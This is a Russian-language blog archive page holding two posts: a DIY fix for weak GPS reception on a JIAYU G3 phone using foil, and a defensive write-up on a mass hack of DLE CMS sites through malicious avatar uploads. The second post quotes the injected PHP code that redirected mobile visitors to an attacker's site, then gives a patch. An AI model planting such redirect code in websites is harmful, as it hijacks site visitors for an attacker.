Home › Tag Archives › исправить

Решение проблемы с GPS на смартфоне JIAYU G3

 

После долгих песен с бубном(удаление файлов, многочисленные перезагрузки, скачивание данных EPO и прочего…. )
было решено поступить кардинально.

В моем случае после обновления данных EPO спутники выстраивались в ряд штук 12-14, но уровень от этих спутников был почти всегда 0. Один единственный раз, когда оставил телефон в машине на некоторое время он нашел и установил соединение с несколькими спутниками. Больше мне добиться подобного не удавалось.

Решил я проверить свою GPS антенну. Как не проверял контакта с общим проводом не было. Было решено заменить штатную антенну. Для этого необходимо снять заднюю внутреннюю крышку телефона.

на задней крышке есть контакт для GPS антенны

 

Я взял фольгу от недоеденного деда мороза
Вырезал в виде буквы Г, кончик должен быть тоньше, чем основание.
Кончик фольги вставляем в прорезь и загибаем поверх старого контакта.

 

 Вот здесь видно как вставлена новая «антенна»

Вид сбоку

 

 

Здесь оставшийся кончик сложен под 90 градусов и приклеен скотчем.

Ну а это результат.

Вообщем проблема в плохом качестве штатной GPS антенны.
Она может периодически не контачить или вообще не иметь контакта.
Видимо дело в плохом напылении токопроводящего слоя.

И еще:

Скрин с YGPS, уровень сигнала зависит от многих факторов. Эти скрины в пасмурную погоду, солнца нет.
У меня с родной антенной уровень сигнала по всем спутникам был 0
Антенна обязательно должна иметь контакт с платой! Фольга загибается и ложится поверх контактной площадки штатной антенны.

 

Размеры антенны: длина 21 мм и ширина 6 мм вырезал на «глаз», так как сразу заработало, то не стал ничего менять.

 

Вот тесты в машине и на открытой местности(было пасмурно) думаю, что точности достаточно вам же не ракеты запускать по цели.

 

 

 

Взлом DLE загрузкой аватара с вредоносным кодом

Этот новый год начался забавно.
Много лет в известном всем движке CMS DLE существовала уязвимость и никто на нее не обращал внимание. Но вот в начале этого года примерно с 6 января, видимо устав от празднования Нового года, хакер под псевдонимом tehApocalypse взломал несколько десятков тысяч сайтов на CMS DLE.

Взлом заключался во внедрении кода в несколько файлов DLE для перенаправления посетителей зараженных сайтов на сайт злоумышленника.

index.php
engine/engine.php
engine/init.php
engine/data/config.php
engine/data/dbconfig.php

Перенаправление происходило только для пользователей сматфонов и прочих продвинутых телефонов.

$iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");
$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");
$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");
$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");
$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");

if ($iphone || $android || $palmpre || $ipod || $berry === true) {
header('Location: http://statuses.ws/');
}

Итак как же исправить эту уязвимость в DLE?

В нескольких файлах, в которых мы можем редактировать профиль пользователя и загружать аватар для этого пользователя есть такой код:

 

if( $thumb->size_auto( $user_group[$member_id['user_group']]['max_foto'] ) ) {
$thumb->jpeg_quality( $config['jpeg_quality'] );
$thumb->save( ROOT_DIR . "/uploads/fotos/foto_" . $id . "." . $type );
} else {
@rename( ROOT_DIR . "/uploads/fotos/" . $id . "." . $type, ROOT_DIR . "/uploads/fotos/foto_" . $id . "." . $type );
}

Так вот все дело в этой строчке

@rename( ROOT_DIR . "/uploads/fotos/" . $id . "." . $type, ROOT_DIR . "/uploads/fotos/foto_" . $id . "." . $type );

Т.е. если аватар не надо изменять по размеру то исходный инжектированный файл копируется в первоначальном виде для дальнейшего использования.

Необходимо преобразовать этот блок кода в новый:

$thumb->size_auto( $user_group[$member_id['user_group']]['max_foto'] );
$thumb->jpeg_quality( $config['jpeg_quality'] );
$thumb->save( ROOT_DIR . "/uploads/fotos/foto_" . $id . "." . $type );

После этого загрузить аватар с вредоносным кодом будет невозможно.
Файлы для редактирования:

engine/inc/editusers.php
engine/modules/register.php
engine/modules/profile.php

Удачи!